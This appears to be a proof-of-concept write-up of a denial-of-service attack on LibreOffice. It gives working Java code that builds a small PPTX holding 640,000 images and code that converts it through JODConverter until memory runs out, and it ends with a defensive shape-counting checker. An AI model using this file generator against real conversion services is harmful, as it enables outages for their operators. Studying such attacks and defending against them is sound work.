1. Generate a malicious PPT file with Java's POI library. Using POI, produce a PowerPoint file with only one slide that contains 800 × 800 = 640,000 images. The PPT file size is 5 MB.

The code is as follows:

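```java
import java.awt.Rectangle;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;

import org.apache.commons.io.FileUtils;
import org.apache.poi.sl.usermodel.PictureData;
import org.apache.poi.xslf.usermodel.XMLSlideShow;
import org.apache.poi.xslf.usermodel.XSLFPictureData;
import org.apache.poi.xslf.usermodel.XSLFPictureShape;
import org.apache.poi.xslf.usermodel.XSLFSlide;

public class PowerPointUtil {
    // Picture shapes per axis: NUM * NUM shapes end up on the single slide.
    private static final int NUM = 800;

    public static void main(String[] args) {
        String path = "E:\\office\\test.pptx";
        try {
            createPPT(path);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static void createPPT(String path) throws IOException {
        byte[] bt = FileUtils.readFileToByteArray(new File("E:\\office\\test.png"));

        // try-with-resources closes the slide show and the output stream.
        try (XMLSlideShow ppt = new XMLSlideShow();
             FileOutputStream out = new FileOutputStream(path)) {
            XSLFSlide slide = ppt.createSlide();
            for (int i = 0; i < NUM; i++) {
                for (int j = 0; j < NUM; j++) {
                    // One picture shape per (i, j), all backed by the same PNG bytes.
                    XSLFPictureData pictureData = ppt.addPicture(bt, PictureData.PictureType.PNG);
                    XSLFPictureShape pic = slide.createPicture(pictureData);
                    pic.setAnchor(new Rectangle(i, j, 50, 50));
                }
            }
            ppt.write(out);
        }
    }
}
```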

2. Drive LibreOffice through the org.jodconverter dependency, with the following initialization:

The code is as follows:

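```java
// Package names below are those of JODConverter 4.3 and later (assumption;
// the page does not state the version used).
import org.jodconverter.core.office.OfficeException;
import org.jodconverter.core.office.OfficeManager;
import org.jodconverter.local.office.LocalOfficeManager;

public class OfficeManagerInstance {
    private static OfficeManager INSTANCE = null;

    public static synchronized void start() {
        officeManagerStart();
    }

    public static synchronized void stop() {
        try {
            INSTANCE.stop();
        } catch (OfficeException e) {
            e.printStackTrace();
        }
    }

    public static void init() {
        // install() registers the built manager as the default one used by JodConverter.
        LocalOfficeManager.Builder builder = LocalOfficeManager.builder().install();
        builder.officeHome("E:\\libreOffice\\");
        builder.portNumbers(8098);
        builder.taskExecutionTimeout(5 * 1000 * 60);    // 5 minutes, in milliseconds
        builder.taskQueueTimeout(10 * 1000 * 60 * 60);  // 10 hours, in milliseconds

        INSTANCE = builder.build();
        officeManagerStart();
    }

    private static void officeManagerStart() {
        if (INSTANCE.isRunning()) {
            return;
        }
        try {
            INSTANCE.start();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```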

3. Finally, call the OfficeManager to convert the PPT to PDF.

The code is as follows:

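```java
import java.io.File;

// Package names are those of JODConverter 4.3 and later (assumption).
import org.jodconverter.core.office.OfficeException;
import org.jodconverter.local.JodConverter;

public class LibreOfficeUtil {
    public static void main(String[] args) {
        String pptPath = "E:\\office\\test.pptx";
        String pdfPath = "E:\\office\\test.pdf";

        OfficeManagerInstance.init();
        OfficeManagerInstance.start();

        try {
            // Hand the file to the LibreOffice process for PPTX -> PDF conversion.
            JodConverter.convert(new File(pptPath)).to(new File(pdfPath)).execute();
        } catch (OfficeException e) {
            e.printStackTrace();
        } finally {
            OfficeManagerInstance.stop();
        }
    }
}
```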

4. Looking at the memory usage, you can see that a PPT file of only 5 MB is enough to make LibreOffice consume a large amount of the machine's memory. The program then crashes, resulting in a DoS condition.
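For a service that converts untrusted uploads this way, a pre-conversion check can reject such a file before LibreOffice ever opens it. The following is an added example, not code from the original README or from JODConverter: the class name `PptxPreflight` and both limits are hypothetical, and it inspects slide parts only (layouts and masters would need the same treatment).

```java
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.util.Enumeration;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

/** Added example: rejects a .pptx whose slides carry an unreasonable number of shapes. */
public class PptxPreflight {
    // Hypothetical limits; tune them to the documents the service legitimately handles.
    private static final int MAX_SHAPES_PER_SLIDE = 2_000;
    private static final int MAX_SLIDES = 500;

    public static void check(File pptx) throws IOException, XMLStreamException {
        XMLInputFactory xif = XMLInputFactory.newFactory();
        // Slide XML needs neither DTDs nor external entities; disable both.
        xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        int slides = 0;
        try (ZipFile zip = new ZipFile(pptx)) {
            Enumeration<? extends ZipEntry> entries = zip.entries();
            while (entries.hasMoreElements()) {
                ZipEntry e = entries.nextElement();
                if (!e.getName().matches("ppt/slides/slide\\d+\\.xml")) continue;
                if (++slides > MAX_SLIDES) throw new IOException("too many slides");
                try (InputStream in = zip.getInputStream(e)) {
                    countShapes(xif.createXMLStreamReader(in), e.getName());
                }
            }
        }
    }

    // Streams the slide XML and stops at the limit, so a huge slide is never fully read.
    private static void countShapes(XMLStreamReader r, String part)
            throws XMLStreamException, IOException {
        int shapes = 0;
        while (r.hasNext()) {
            if (r.next() != XMLStreamConstants.START_ELEMENT) continue;
            String n = r.getLocalName();
            // pic = picture, sp = shape, graphicFrame = table/chart, cxnSp = connector
            if ((n.equals("pic") || n.equals("sp") || n.equals("graphicFrame")
                    || n.equals("cxnSp")) && ++shapes > MAX_SHAPES_PER_SLIDE) {
                throw new IOException(part + ": more than " + MAX_SHAPES_PER_SLIDE + " shapes");
            }
        }
    }
}
```

Call `PptxPreflight.check(new File(pptPath))` before `JodConverter.convert(...)`. The `taskExecutionTimeout` set in step 2 bounds conversion time, not memory, so the LibreOffice process should also run under an OS-level memory limit.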
